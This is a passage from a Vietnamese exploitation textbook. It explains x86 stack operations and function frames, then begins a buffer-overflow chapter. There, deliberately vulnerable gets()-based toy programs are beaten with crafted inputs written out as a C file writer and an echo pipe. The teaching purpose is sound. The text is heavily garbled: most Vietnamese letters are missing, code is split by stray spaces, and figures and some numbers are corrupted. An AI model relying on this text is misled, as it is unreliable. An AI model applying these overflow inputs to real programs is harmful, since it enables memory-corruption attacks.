Ty vo mi lnh ring bit m dst v src c th c cc dng khc nhau.
Nhn chung, chng ta c cc dng sau y cho dst v src.
Gi tr trc tip l mt gi tr c th nh 6789ABCD. V d MOV EAX, 6789ABCD
s gn gi tr 6789ABCD vo thanh ghi EAX. Gi tr trc tip khng th
ng vai tr ca dst.
Thanh ghi l cc thanh ghi nh EAX, EBX, ECX, EDX. Xem v d trn.
B nh l gi tr ti nh c a ch c ch nh. trnh nhm ln
vi gi tr trc tip, a ch ny c t trong hai ngoc vung. V d
MOV EAX, [6789ABCD] s gn gi tr 32 bit bt u t nh 6789ABCD
vo thanh ghi EAX. Chng ta cng s gp cc thanh ghi trong a ch
nh v d nh lnh MOV EAX, [ECX + EBX] s gn gi tr 32 bit bt u
t nh ti a ch l tng gi tr ca hai thanh ghi EBX v ECX. Bn
c cng nn lu rng lnh LEA (Load Effective Address, gn a ch)
vi cng i s nh trn s gn gi tr l tng ca ECX v EBX vo thanh
ghi EAX v a ch nh ca src chnh l ECX + EBX.
2.2.4.3 Ngn xp
Chng ta nhc n ngn xp (stack) trong khi bn v cc nhm lnh Tiu
mc 2.2.4.1. Ngn xp l mt vng b nh c h iu hnh cp pht sn cho
chng trnh khi np. Chng trnh s s dng vng nh ny cha cc bin
cc b (local variable), v lu li qu trnh gi hm, thc thi ca chng trnh.
Trong phn ny chng ta s bn ti cc lnh v thanh ghi c bit c nh hng
n ngn xp.
Ngn xp hot ng theo nguyn tc vo sau ra trc (Last In, First Out).
Cc i tng c a vo ngn xp sau cng s c ly ra u tin. Khi
nim ny tng t nh vic chng ta chng cc thng hng ln trn nhau.
Thng hng c chng ln cui cng s trn cng, v s c d ra u tin.
Nh vy, trong sut qu trnh s dng ngn xp, chng ta lun cn bit v tr
nh ca ngn xp. Thanh ghi ESP lu gi v tr nh ngn xp, tc a ch
nh ca i tng c a vo ngn xp sau cng, nn cn c gi l con tr
ngn xp (stack pointer).
Thao tc a mt i tng vo ngn xp l lnh PUSH. Thao tc ly t
ngn xp ra l lnh POP. Trong cu trc Intel x86 32 bit, khi ta a mt gi
tr vo ngn xp th CPU s tun t thc hin hai thao thc nh:
1. ESP c gn gi tr ESP - 4, tc gi tr ca ESP s b gim i 4.
2. i s ca lnh PUSH c chuyn vo 4 byte trong b nh bt u t
a ch do ESP xc nh.
Ngc li, thao tc ly gi tr t ngn xp s khin CPU thc hin hai tc v
o:
1. Bn byte b nh bt u t a ch do ESP xc nh s c chuyn vo
i s ca lnh POP.
2. ESP c gn gi tr ESP + 4, tc gi tr ca ESP s c tng thm 4.
Chng ta nhn ra rng khi nim nh ngn xp trong cu trc Intel x86 s c
gi tr thp hn cc v tr cn li ca ngn xp v mi lnh PUSH s gim nh
ngn xp i 4 n v. Trong cc cu trc khc, nh ngn xp c th c gi tr
cao hn cc v tr cn li. Ngoi ra, v mi ln PUSH, hay POP con tr lnh
u b thay i 4 n v nn mt (slot) ngn xp s c di 4 byte, hay 32
bit.
BFFFF6C0
...
XX XX XX XX
...
ESP=BFFFF6C0
EAX=42413938
XX: khng xc !"nh
(a) Trc
BFFFF6C0
...
38 39 41 42
...
ESP=BFFFF6BC
EAX=42413938
!"a vo
(b) Sau
Hnh 2.4: Trc v sau lnh PUSH EAX
Gi s nh ESP ang c gi tr BFFFF6C0, v EAX c gi tr 42413938,
Hnh 2.4 minh ha trng thi ca b nh v gi tr cc thanh ghi trc, v sau
khi thc hin lnh PUSH EAX.
Gi s 4 byte b nh bt u t a ch BFFFF6BC c gi tr ln lt l 38,
39, 41, 42, v ESP ang c gi tr l BFFFF6BC, Hnh 2.5 minh ha trng thi
ca b nh v gi tr cc thanh ghi trc, v sau khi thc hin lnh POP EAX.
2.2.4.4 Cc lnh gi hm
Ngn xp cn cha mt thng tin quan trng khc lin quan ti lung thc thi
ca chng trnh: a ch con tr lnh s chuyn ti sau khi mt hm kt thc
bnh thng.
Gi s trong hm main chng ta gi hm printf in ch Hello World! ra
mn hnh. Sau khi printf hon thnh nhim v , lung thc thi s phi
c tr li cho main tip tc thc hin nhng tc v k tip. Hnh 2.6 m
t qu trnh gi hm v tr v t mt hm con (hm c gi). Chng ta thy
rng khi kt thc bnh thng, lung thc thi s tr v ngay sau lnh gi hm
printf trong main.
Khi c chuyn qua hp ng, chng ta c on m tng t nh sau:
08048446 ADD ESP, -0x0C
BFFFF6C0
...
38 39 41 42
...
ESP=BFFFF6BC
EAX=XXXXXXXX
(a) Trc
BFFFF6C0
...
38 39 41 42
...
ESP=BFFFF6C0
EAX=42413938
l!y ra
(b) Sau
Hnh 2.5: Trc v sau lnh POP EAX
08048449 PUSH 0x08048580
0804844E CALL printf
08048453 ADD ESP, 0x10
Ti a ch 08048449, tham s u tin ca printf c a vo ngn xp. Gi
tr 08048580 l a ch ca vng nh cha chui Hello World!. Tip lnh
CALL thc hin hai tc v tun t:
1. a a ch ca lnh k tip ngay sau lnh CALL (08048453) vo ngn
xp. Tc v ny c th c hiu nh mt lnh PUSH $+5 vi $ l a ch
ca lnh hin ti (0804844E).
2. Chuyn con tr lnh ti v tr ca i s, tc a ch hm printf nh trong
v d.
Sau khi thc hin xong nhim v ca mnh, hm printf s chuyn con tr lnh
v li gi tr c lnh CALL lu trong ngn xp thng qua lnh RET. Lnh
RET thc hin hai tc v o:
1. Ly gi tr trn nh ngn xp. Tc v ny tng t nh mt lnh POP.
2. Gn con tr lnh bng gi tr nhn c bc 1.
main printf
A
...
printf("Hello World!");
B
...
...
g!i
v"
Hnh 2.6: Gi vo v tr v t mt hm
Hnh 2.7 v Hnh 2.8 m t trng thi thanh ghi v b nh trc v sau khi
thc hin lnh CALL, v lnh RET.
Cho n y, bn c c th nhn thy rng chng ta c ba cch iu
khin lung thc thi ca chng trnh:
1. Thng qua cc lnh nhy nh JMP, JNZ, JA, JB.
2. Thng qua lnh gi hm CALL.
3. Thng qua lnh tr v RET.
i vi cch mt v hai, a ch mi ca con tr lnh l i s ca lnh tng
ng, v do c chn thng vo trong m my. Nu mun thay i a s
dng trong hai cch u, chng ta buc phi thay i lnh. Ring cch cui cng
da ch con tr lnh c ly ra t trn ngn xp. iu ny cho php chng ta
xp t d liu v lm nh hng n lnh thc thi. y l nguyn tc c bn
tn dng li trn b m.
Tuy nhin, trc khi chng ta bn ti trn b m, mt vi kin thc v
cch trnh bin dch chuyn t m C sang m my, v v tr cc bin ca hm
c sp xp trn b nh s gip ch rt nhiu trong vic tn dng li.
...
80 85 04 08
XX XX XX XX
...
EIP=0804844E
ESP
...
ADD ESP, -0x0C
PUSH 0x08048580
CALL printf
ADD ESP, 0x10
(a) Trc
...
80 85 04 08
53 84 04 08
...
EIP=B7EF22F0
ESP
...
PUSH EBP
MOV EBP, ESP
...
(b) Sau
Hnh 2.7: Trc v sau lnh CALL
...
80 85 04 08
53 84 04 08
...
EIP=B7EF2328
ESP
...
ADD ESP, 0x10
POP EBX
POP EBP
RET
...
(a) Trc
...
80 85 04 08
53 84 04 08
...
EIP=08048453
ESP
...
ADD ESP, -0x0C
PUSH 0x08048580
CALL printf
ADD ESP, 0x10
(b) Sau
Hnh 2.8: Trc v sau lnh RET
2.3. TRNH BIN DCH V CU TRC MT HM 27
2.3 Trnh bin dch v cu trc mt hm
Trnh bin dch thc hin vic chuyn m ngn ng cp cao nh hp ng, C,
hay Pascal sang m my. Trong phn ny chng ta s xem xt trnh bin dch
GCC phin bn 2.95 bin dch mt hm n gin vit bng C sang hp ng ra
sao. on m C c lit k di:
1 i nt f unc ( i nt a , i nt b)
2 {
3 i nt c ;
4 char d [ 7 ] ;
5 short e ;
6 return 0;
7 }
y l mt hm tn func, c hai bin t ng (automatic variable) tn a,
kiu int, v b, cng kiu int. Hm ny cn c ba bin ni b (local variable) tn
c, kiu int, d, mng 7 char, v e, kiu short. Hm tr v mt gi tr kiu int.
i vi bt k mt hm C no, trnh bin dch s to ra mt hm tng ng
c ba phn:
Dn nhp (prolog) l phn u ca mt hm, c nhim v lu tr thng tin
v vng nh (frame) ca hm gi (caller) hm ang xt l hm c
gi (callee) v cp pht b nh cho cc bin ni b trc khi thn hm
c thc thi.
Thn l phn chnh ca hm, bao gm cc lnh thc hin nhim v ca hm.
Kt thc (epilog) l phn cui ca mt hm, c nhim v hy b vng nh
c cp pht phn dn nhp ng thi chuyn li vng nh ca
hm gi.
2.3.1 Dn nhp
Thng thng, phn dn nhp gm hai dng lnh chnh v mt dng lnh ph
nh sau:
PUSH EBP
MOV EBP, ESP
SUB ESP, 0x20
Hai dng lnh u tin lu gi tr ca thanh ghi EBP vo ngn xp, v sau
gn gi tr hin ti ca con tr ngn xp cho EBP. Nh vy, sau lnh ny EBP
v ESP u tr n cng mt trn ngn xp, v ny cha gi tr EBP c
(saved EBP).
Lnh th ba gim gi tr ca con tr ngn xp xung mt s n v nht
nh. Trong v d trn ta thy ESP b gim i 20 n v. Khong trng ny
chnh l phn b nh c cp pht cho cc bin ni b trong hm. Nh vy,
gi tr dng lnh th ba phi lun lun ln hn hoc bng vi tng ln
ca cc bin ni b. Chng ta hy th tnh xem hm ang xt cn bao nhiu
byte b nh cho cc bin ny. Trc tin bin c c kiu int nn s c GCC
cp pht 4 byte. Bin d l mng 7 phn t kiu char. Mi mt char c GCC
EBP
ESP
...
EBP c!
c
d
d
e
d"
d"
d"
d"
...
20
Hnh 2.9: V tr cc bin ni b trn ngn xp
cp pht 1 byte. Nh vy bin d s c cp 8 byte. Khng, tc gi khng
nhm ln khi thc hin php nhn mt vi by. ch thc kt qu ca 7 1 s
l 7 nhng v l do ti u ha tc truy cp b nh v con tr ngn xp
lun c gi tr chia ht cho 4 nn GCC s cp pht 8 byte thay v 7 byte. Cui
cng l bin e s c cp 4 byte thay v 2 byte cho kiu short vi cng l do.
Nh vy, tng cng b nh cn cp pht cho bin ni b s l 4 + 8 + 4 = 10.
Do ti thiu ESP phi b gim i 10 n v, v trong v d ny ESP b
gim i 20 n v, nhiu hn cn thit.
Trong tng s nh c dnh cho cc bin ni b, v tr cc bin trn ngn
xp s c cp theo v tr xut hin ca chng trong m ngun C. Gi s nh
m ngun ch c mt bin ni b c, th 4 byte s c dnh cho ring c. Nu
m ngun c hai bin ni b ln lt l c v d th 4 byte u tin s dng cho
c, v 8 byte k tip s c dng cho d. Tng t vi v d ca chng ta, 4 byte
u tin s c dnh cho c, 8 byte k cho d, v 4 byte cui cho e nh trong
Hnh 2.9.
2.3.2 Thn
Thn hm bao gm cc lnh thc hin mc ch ca hm. Trong v d n gin
ca chng ta, thn hm s ch c mt lnh XOR EAX, EAX. Lnh ny thc hin
php lun l XOR gia thanh ghi EAX v chnh n, kt qu c lu li vo
thanh ghi EAX. Sau khi thc hin lnh, thanh ghi EAX s cha gi tr 0.
C hai iu chng ta cn lu y. Th nht, trong m C, chng ta s
dng cu lnh return 0, v cu lnh ny tng ng vi lnh XOR trn. im
ny cho ta bit rng gi tr tr v ca mt hm s c lu trong thanh ghi
EAX. Th hai, trong thn hm gi tr ca thanh ghi EBP khng thay i. im
ny khng c nu r trong v d nhng s c ni ti phn k.
2.3.3 Kt thc
Cng nh dn nhp, kt thc gm hai lnh chnh v mt lnh ph:
MOV ESP, EBP
POP EBP
RET
Hai lnh u tin thc hin tc v o ca phn dn nhp. Gi tr hin ti ca
EBP s c gn vo cho con tr ngn xp, v sau EBP c phc hi vi
gi tr lu trn ngn xp.
Cu hi y l gi tr no trn ngn xp s c gn cho EBP. Chng ta
vn cn nh trong phn dn nhp, gi tr EBP c c lu li vi lnh PUSH
EBP. phn kt thc, chnh gi tr ny s c phc hi qua lnh POP EBP.
lm c vic ny, r rng gi tr EBP phi khng b thay i trong sut thn
hm sao cho khi phc hi con tr ngn xp th ESP s v li v tr cha gi tr
EBP c.
C mt im nh bn c s nhn ra rng s lnh PUSH v s lnh POP
thng s cn bng vi nhau. Nh ta c PUSH EBP phn dn nhp th kt
thc ta c POP EBP. y chnh l kh nng cha d liu tm ca ngn xp. Khi
cn lu mt gi tr no vo ngn xp th ta dng lnh PUSH, v khi ly ra
ta dng lnh POP.
Dng lnh th ba thay i lung iu khin quay v hm gi. Nh vy, ngay
sau gi tr EBP c trn ngn xp s phi l a ch tr v lnh RET s dng.
V sau khi thc hin lnh RET, con tr ngn xp s tr ti v tr trn a ch
tr v. Hnh 2.10 m t cu trc b nh ca v d hm n gin m chng ta
va trao i.
c gi cng xin c lu rng th t cc lnh c trnh by y l
theo cch thng thng nht, nhng trong qu trnh thc hnh c gi s c
th thy cc lnh ny tuy vn tun theo th t , nhng ng thi cng c cc
lnh khc chn vo, hoc cc lnh ny c thay th bi cc lnh tng ng.
y l do qu trnh ti u ha ca trnh bin dch v c xem xt ti k hn
trong chng trnh o to ti trung tm ca tc gi.
Ti y, chng ta kt thc trao i v v tr cc bin ni b trn ngn
xp, v gi tr tr v ca hm. Phn k s bn tip v cc i s (tham s,
parameter) ca hm.
2.3.4 Gi hm
Chng ta nh rng hm func nhn vo hai i s l a v b, cng kiu int, i
s a c khai bo trc i s b. Khi chuyn sang hp ng, trnh bin dch s
chuyn cc li gi n hm func thnh nhng dng lnh sau:
PUSH b
PUSH a
CALL func
Nh vy hai i s c a vo ngn xp theo th t ngc li vi th t
chng c khai bo thng qua hai dng lnh PUSH. Sau lnh CALL s tip
EBP=EBP c!
ESP
...
.
.
.
...
"#a ch$ tr% v&
EBP c!
c
d
d
e
...
Hnh 2.10: B nh v thanh ghi sau khi kt thc hm
tc a a ch tr v vo ngn xp v chuyn con tr lnh ti phn dn nhp
ca hm func. Kt hp vi nhng g chng ta bn qua Tiu mc 2.3.1,
chng ta c th dng nn m hnh hon chnh v cu trc ngn xp ca mt
hm nh minh ha trong Hnh 2.11.
Tt c cc ngn xp t v tr i s cui cng (v tr ca b) cho n v
tr ca bin ni b cui cng (v tr ca e) c gi l mt vng nh ngn xp
(stack frame). Mi vng nh ngn xp cha thng tin trng thi ca mt hm
nh chng ta bn qua bao gm cc i s, a ch tr v ca hm, thng tin
v vng nh ca hm gi, v cc bin ni b. Mi vng nh tng ng vi mt
lnh gi hm cha kt thc. V d hm main gi hm func v hm func ang
c thc hin th chng ta s c cc vng nh ngn xp nh trong Hnh 2.12.
2.3.5 Con tr vng nh
Hm thc thi c th truy xut cc d liu trng thi thng qua con tr vng
nh (frame pointer). Con tr vng nh lun lun ch ti v tr c nh ca mt
vng nh. Cc d liu khc c truy xut thng qua v tr tng i i vi
con tr vng nh. Vic lm ny tng t nh khi ni phm A cch phm F
v pha tri 3 phm. V chng ta lun lun nh v c phm F v n l phm
c g bn tay tri trn bn phm cho nn ta s xc nh c phm A . Con
tr vng nh ca chng ta chnh l EBP v EBP lun lun ch ti ngn xp
cha gi tr EBP c v nhng i tng khc u c th c xc nh theo
gi tr ca thanh ghi EBP v d nh bin c s c ch ti bi EBP4, bin d
c ch ti bi EBPC.
Da vo gc i chiu l thanh ghi EBP, ta cng s thy rng cc i tng
EBP
...
b
a
!"a ch# tr$ v%
EBP c&
c
d
d
e
...
vng nh! ng"n x#p
Hnh 2.11: M hnh ngn xp ca mt hm
...
!"i s" c#a main
...
!$a ch% tr& v'
EBP c(
...
bi)n n*i b* c#a main
...
...
!"i s" c#a func
...
!$a ch% tr& v' main
EBP c#a main
...
bi)n n*i b* c#a func
...
vng nh!
c"a main
vng nh!
c"a func
Hnh 2.12: Cc vng nh ngn xp
khc c sp xp mt cch kh hp l v gii thch l do ti sao i s ca
hm c a vo ngn xp theo th t ngc. Khi , i s th nht s l
EBP+8, i s th hai s l EBP+C, tc a ch nh ca cc i s tng dn
theo th t khai bo. Tng t, a ch ca cc bin gim dn theo th t khai
bo.
Ngoi ra, chng ta cng c th hon ton xc nh c vai tr ca nhng
ngn xp khc trong vng nh khi xc nh c vai tr ca mt bt
k cn li. Cng ging nh khi ta xc nh c bt k phm no trn bn
phm l phm g, th ta cng s tm c phm A v cu trc bn phm khng
thay i. Vi m hnh cu trc b nh ca mt hm c thit lp trong
Hnh 2.11, gi s nh ta xc nh c rng ngn xp ti a ch 6789ABCC
gi a ch tr v ca hm th ngn xp ti a ch 6789ABC8 s gi gi tr
EBP ca hm gi, v ngn xp ti a ch 6789ABD0 s l i s th nht
nh trong Hnh 2.13.
6789ABCC
...
!"a ch# tr$ v%
...
(a) Xc nh vai tr ca mt ngn xp
6789ABD0
...
!"i s" 2
!"i s" 1
!#a ch$ tr% v&
EBP c'a hm g(i
bi)n n*i b*
bi)n n*i b*
...
6789ABCC
6789ABC8
(b) Xc nh vai tr cc cn li
Hnh 2.13: Xc nh vai tr cc ngn xp
2.4. TM TT V GHI NH 33
2.4 Tm tt v ghi nh
H c s nh phn, thp phn, v thp lc phn c th c chuyn i
qua li da vo cng thc ton hc. Chuyn i qua li gia h nh phn
v h thp lc phn cn c th s dng bng tra cu tng cm 4 bit.
My tnh ch s dng h nh phn do cn mt quy c biu din
cc k t ch ci. Bng m ASCII l mt trong cc quy c .
B vi x l Intel x86 32 bit gm c cc thanh ghi chung, thanh ghi ngn
xp, thanh ghi c.
B nh c nh a ch mt cch tuyn tnh theo rng ca ng
truyn a ch (32 bit). Intel CPU truy cp b nh theo quy c kt thc
nh, byte a ch thp mang t ngha hn byte a ch cao.
Tp lnh l t vng ca CPU, bao gm cc m my, hay cn gi l ngn
ng lp trnh th h th nht. Hp ng l b t vng dnh cho con ngi,
cn c bit n nh l ngn ng lp trnh th h th hai.
C nhiu nhm lnh nh nhm lnh nhy, nhm lnh hm, nhm lnh
ngn xp, nhm lnh s hc. Cc lnh ny thng c c php gm hai i
s trong i s u tin thng nhn kt qu ca lnh.
Ngn xp l vng nh c h iu hnh cp cho chng trnh khi np n
vo b nh. Ngn xp cha thng tin v cc bin ni b ca chng trnh
v qu trnh thc thi chng trnh. Cc lnh nh hng ti ngn xp ch
yu gm PUSH, POP, CALL, v RET. Cc lnh ny lm thay i gi tr
ca thanh ghi ESP, hay cn gi l con tr ngn xp. PUSH gim gi tr
ca ESP, trong khi POP tng gi tr ca ESP. Con tr ngn xp lun lun
ch n nh ngn xp.
Trnh bin dch chuyn t ngn ng cp cao hn ra m my.
Mt hm thng c bin dch ra thnh ba phn, dn nhp, thn v
kt thc. Phn dn nhp khi to vng nh ca hm, v lu thng tin v
vng nh ca hm gi. Phn thn thc hin cc tc v t c mc
tiu ca hm. Phn kt thc ly li vng nh c cp pht phn
dn nhp v thit lp li vng nh ca hm gi.
Gi tr tr v ca mt hm thng c cha trong thanh ghi EAX.
Khi gi hm, cc i s ca hm c a vo ngn xp theo th t ngc
li vi th t chng c khai bo.
Trong GCC 2.95, cc bin ni b ca hm c phn b cc ngn xp
theo th t chng c khai bo. ti u ha truy cp b nh, n v
nh nht cp pht cho cc bin ni b l mt ngn xp.
Vng nh ngn xp ca mt hm bt u vi cc i s, a ch tr v,
gi tr EBP c, v cc bin ni b. M hnh ny khng thay i nn khi
xc nh c vai tr ca mt ngn xp th vai tr ca cc ngn xp
khc cng c xc nh.
Vai tr ca cc ngn xp trong vng nh ca mt hm cn c th c
xc nh v truy cp thng qua con tr vng nh EBP. Gi tr ca EBP
khng thay i trong sut qu trnh thc thi ca hm v lun tr ti
ngn xp cha gi tr EBP ca hm gi.
Chng 3
Trn b m
Trn b m l loi li thng thng, d trnh, nhng li ph bin v nguy
him nht. Ngay t khi c bit n cho ti ngy nay, trn b m lun lun
c lit k vo hng danh sch cc li e da nghim trng n s an ton
h thng. Nm 2009, t chc SANS a ra bo co 25 li lp trnh nguy him
nht
1
trong vn c li trn b m.
Trong chng ny, chng ta s xem xt bn cht ca li trn b m l
g, cc cch tn dng li thng thng nh thay i gi tr bin, quay v bn
thn hm, quay v th vin chun v lin kt nhiu ln quay v th vin chun.
Chng ta s i qua mt lot nhng v d t c bn n phc tp nhn ra
nhng gi tr quan trng trong qu trnh thc thi ca mt chng trnh.
3.1 Gii thiu
Trn b m l li xy ra khi d liu x l (thng l d liu nhp) di qu
gii hn ca vng nh cha n. V ch n gin nh vy.
Tuy nhin, nu pha sau vng nh ny c cha nhng d liu quan trng ti
qu trnh thc thi ca chng trnh th d liu d c th s lm hng cc d
liu quan trng ny. Ty thuc vo cch x l ca chng trnh i vi cc d
liu quan trng m ngi tn dng li c th iu khin chng trnh thc hin
tc v mong mun.
Hnh 3.1 m t v tr d liu v qu trnh trn b m.
Qua , chng ta nhn ra ba im thit yu ca vic tn dng li trn b
m:
1. D liu quan trng phi nm pha sau d liu c th b trn. Nu nh
trong Hnh 3.1, d liu quan trng nm bn tri th cho d d liu trn
c nhiu n my cng khng th lm thay i d liu quan trng.
2. Phn d liu trn phi trn ti c d liu quan trng. i khi ta c
th lm trn b m mt s lng t d liu, nhng cha di c th
lm thay i gi tr ca d liu quan trng nm cch xa .
3. Cui cng, d liu quan trng b thay i vn phi cn ngha vi chng
trnh. Trong nhiu trng hp, tuy ta c th thay i d liu quan trng,
1
http://www.sans.org/top25errors
35
36 CHNG 3. TRN B M
... ...... ...
d! li"u nh#p d! li"u quan tr$ng
(a) Mt t d liu
... .. ...
(b) D liu nhp di hn
... ...
(c) D liu quan trng b ghi
Hnh 3.1: Trn b m
3.2. THAY I GI TR BIN NI B 37
1 #include <s t di o . h>
2
3 i nt main ( )
4 {
5 i nt cooki e ;
6 char buf [ 1 6 ] ;
7 pr i nt f ( "&buf : %p , &cooki e : %p\n" , buf , &cooki e ) ;
8 ge t s ( buf ) ;
9 i f ( cooki e == 0x41424344 )
10 {
11 pr i nt f ( "Youwin ! \ n" ) ;
12 }
13 }
Ngun 3.1: stack1.c
nhng trong qu trnh ta cng thay i cc d liu khc (v d nh cc
c lun l) v khin cho chng trnh b qua vic s dng d liu quan
trng. y l mt nguyn tc c bn trong cc c ch chng tn dng li
trn ngn xp ca cc trnh bin dch hin i. Cc c ch ny c bn
n chi tit trong chng trnh ging dy nng cao ti trung tm o to
ca tc gi.
Khi nm vng nguyn tc ca trn b m, chng ta sn sng xem xt mt
lot v d tm d liu quan trng bao gm nhng d liu g v cch thc s
dng chng. Trong tt c cc v d sau, mc tiu chng ta mun t c l
dng ch You win! c in ln mn hnh.
3.2 Thay i gi tr bin ni b
Ngun 3.1 l v d u tin ca chng ta. bin dch nhng v d tng t ta
s dng c php lnh gcc -o <tn> <tn.c> nh trong hnh chp bn di.
regular@exploitation:~/src$ gcc -o stack1 stack1.c
/tmp/ccxYIaRx.o: In function main:
stack1.c:(.text+0x26): warning: the gets function is dangerous and should not
be used.
Bn c d dng nhn ra rng GCC cnh bo v s nguy him ca vic
s dng hm gets. Chng ta b qua cnh bo v y chnh l hm s gy ra
li trn b m, i tng m chng ta ang bn n trong chng ny. Ngoi
ra, c gi cng c lu v phin bn GCC ang s dng l phin bn 2.95.
regular@exploitation:~/src$ gcc -v
Reading specs from /usr/lib/gcc-lib/i486-linux-gnu/2.95.4/specs
gcc version 2.95.4 20011002 (Debian prerelease)
tn dng li thnh cng, ngi tn dng li phi hiu r chng trnh
hot ng nh th no. Ngun 3.1 nhn mt chui t b nhp chun (stdin)
38 CHNG 3. TRN B M
...
!"a ch# tr$ v%
ebp c&
cookie
buf
buf
buf
buf
...
Hnh 3.2: V tr cookie v buf
thng qua hm gets. Nu gi tr ca bin ni b cookie l 41424344 th s in ra
b xut chun (stdout) dng ch You win!. Bin cookie ng vai tr l mt
d liu quan trng trong qu trnh hot ng ca chng trnh.
Thng qua vic hiu cch hot ng ca chng trnh, chng ta thy rng
chnh bn thn chng trnh cha m thc hin tc v mong mun (in ra
mn hnh dng ch You win!). Do mt trong nhng con ng t c
mc tiu y l gn gi tr ca cookie bng vi gi tr 41424344.
Ngoi vic hiu cch hot ng ca chng trnh, ngi tn dng li d nhin
phi tm c ni pht sinh li. Chng ta may mn c GCC thng bo rng
li nm hm gets. Vn gi y tr thnh lm sao tn dng li hm
gets gn gi tr ca cookie l 41424344.
Hm gets thc hin vic nhn mt chui t b nhp chun v a vo b
m. K t kt thc chui (m ASCII 00) cng c hm gets t ng thm
vo cui. Hm ny khng kim tra kch thc vng nh dng cha d liu
nhp cho nn s xy ra trn b m nu nh d liu nhp di hn kch thc
ca b m.
Vng nh c truyn vo hm gets cha d liu nhp l bin ni b
buf. Trn b nh, cu trc ca cc bin ni b ca hm main c xc nh
nh trong Hnh 3.2. V bin cookie c khai bo trc nn bin cookie s c
phn pht b nh trong ngn xp trc, cng ng ngha vi vic bin cookie
nm a ch cao hn bin buf, v do nm pha sau buf trong b nh.
Nu nh ta nhp vo 6 k t abcdef th trng thi b nh s nh Hnh
3.3a, 10 k t 0123456789abcdef th byte u tin ca cookie s b vit vi
k t kt thc chui, v 14 k 0123456789abcdefghij t th ton b bin cookie
s b ta kim sot.
cookie c gi tr 41424344 th cc nh ca bin cookie phi c gi tr
ln lt l 44, 43, 42, 41 theo nh quy c kt thc nh ca b vi x l Intel
x86. Hnh 3.3d minh ha trng thi b nh cn t ti dng ch You win!
c in ra mn hnh.
3.2. THAY I GI TR BIN NI B 39
...
!"a ch# tr$ v%
ebp c&
cookie
XX XX XX XX
XX XX XX XX
65 66 00 XX
61 62 63 64
...
(a) Chui 6 k t
...
!"a ch# tr$ v%
ebp c&
00 XX XX XX
63 64 65 66
38 39 61 62
34 35 36 37
30 31 32 33
...
(b) Chui 10 k t
...
!"a ch# tr$ v%
00 XX XX XX
67 68 69 6A
63 64 65 66
38 39 61 62
34 35 36 37
30 31 32 33
...
(c) Chui 14 k t
...
!"a ch# tr$ v%
ebp c&
44 43 42 41
buf
buf
buf
buf
...
(d) Trng thi cn t ti
Hnh 3.3: Qu trnh trn bin buf v trng thi cn t
40 CHNG 3. TRN B M
2
3 i nt main ( )
4 {
5 i nt cooki e ;
6 char buf [ 1 6 ] ;
8 ge t s ( buf ) ;
9 i f ( cooki e == 0x01020305 )
10 {
11 pr i nt f ( "Youwin ! \ n" ) ;
12 }
13 }
Ngun 3.2: stack2.c
Nh vy, d liu m chng ta cn nhp vo chng trnh l 10 k t bt k
lp y bin buf, theo sau bi 4 k t c m ASCII ln lt l 44, 43, 42, v
41. Bn k t ny chnh l D, C, B, v A theo Bng 2.2. Hnh chp sau l kt
qu khi ta nhp vo 10 k t a v DCBA.
regular@exploitation:~/src$ ./stack1
&buf: 0xbffffa44, &cookie: 0xbffffa54
aaaaaaaaaaaaaaaaDCBA
You win!
regular@exploitation:~/src$
Chng ta tn dng thnh cng li trn b m ca chng trnh ghi
mt bin ni b quan trng. Kt qu t c v d ny ch yu chnh l
cu tr li cho mt cu hi quan trng: cn nhp vo d liu g. cc v d
sau, chng ta s gp nhng cu hi tng qut tng t m bt k qu trnh tn
dng li no cng phi c cu tr li.
3.3 Truyn d liu vo chng trnh
Cu hi th hai m ngi tn dng li phi tr li l lm cch no truyn d
liu vo chng trnh. i khi chng trnh c t b nhp chun, i khi t
mt tp tin, khi khc li t mt socket. Chng ta phi bit chng trnh nhn
d liu t u c th truyn d liu cn thit vo chng trnh thng qua
con ng y.
Ngun 3.2 rt gn vi v d trc. im khc bit duy nht gia hai chng
trnh l gi tr so snh 01020305.
3.3. TRUYN D LIU VO CHNG TRNH 41
regular@exploitation:~/src$ diff -u stack1.c stack2.c
--- stack1.c 2009-01-18 13:14:00.000000000 +0700
+++ stack2.c 2009-01-18 13:14:00.000000000 +0700
@@ -6,7 +6,7 @@
char buf[16];
printf("&buf: %p, &cookie: %p\n", buf, &cookie);
gets(buf);
- if (cookie == 0x41424344)
+ if (cookie == 0x01020305)
{
printf("You win!\n");
}
Bn c d dng nhn ra d liu tn dng li bao gm 10 k t bt k
lp y bin buf v 4 k t c m ASCII ln lt l 5, 3, 2 v 1. Tuy nhin,
cc k t ny l nhng k t khng in c, khng c trn bn phm nn cch
nhp d liu t bn phm s khng dng c.
'
&
$
%
Dng c v suy ngh
Nu chng trnh c t b nhp chun, th c bao nhiu cch truyn d
liu ti chng trnh?
V chng trnh c t b nhp chun nn chng ta c th dng nhng cch
sau truyn d liu qua b nhp chun:
Chuyn hng (redirection) B nhp chun c th c chuyn hng t
bn phm qua mt tp tin thng qua k t < nh trong cu lnh ./stack1
< input. Khi thc hin cu lnh ny, ni dung ca tp tin input s c
dng thay cho b nhp chun. Mi tc v c t b nhp chun s c
t tp tin ny.
ng (pipe) l mt cch trao i thng tin lin tin trnh (interprocess com-
munication, IPC) trong mt chng trnh gi d liu cho mt chng
trnh khc. B nhp chun c th c chuyn hng tr thnh u
nhn ca ng nh trong cu lnh ./sender | ./receiver. Chng trnh
pha trc k t | (gi Shift v nhn \ ) l chng trnh gi d liu,
b xut chun ca chng trnh ny s gi d liu vo ng thay v gi ra
mn hnh; chng trnh pha sau k t | l chng trnh nhn d liu, b
nhp chun ca chng trnh ny s c d liu t ng thay v bn phm.
Vi hai cch trn, mt k t bt k c th c truyn vo chng trnh thng
qua b nhp chun. V d tn dng li Ngun 3.2 vi cch u tin, chng
ta s to mt tp tin cha d liu nhp thng qua Ngun 3.3. Sau chng ta
gi chng trnh b li v chuyn hng b nhp chun ca n qua tp tin
c to.
42 CHNG 3. TRN B M
2
3 i nt main( i nt argc , char argv )
4 {
5 char s [ ] = "aaaaaaaaaaaaaaaa\x05\x03\x02\x01" ;
6 FILE f = f open ( argv [ 1 ] , "wb" ) ;
7 f wr i t e ( s , 1 , si zeof ( s ) , f ) ;
8 f c l o s e ( f ) ;
9 return 0;
10 }
Ngun 3.3: exp2.c
regular@exploitation:~/src$ gcc -o exp2 exp2.c
regular@exploitation:~/src$ ./exp2 redirect
regular@exploitation:~/src$ ./stack2 < redirect
You win!
Nu s dng cch th hai, vic tn dng li s n gin hn v chng ta c
th dng cc lnh c sn nh echo truyn cc k t c bit qua ng.
regular@exploitation:~/src$ echo -e "aaaaaaaaaaaaaaaa\005\003\002\001" | ./stack
2
You win!
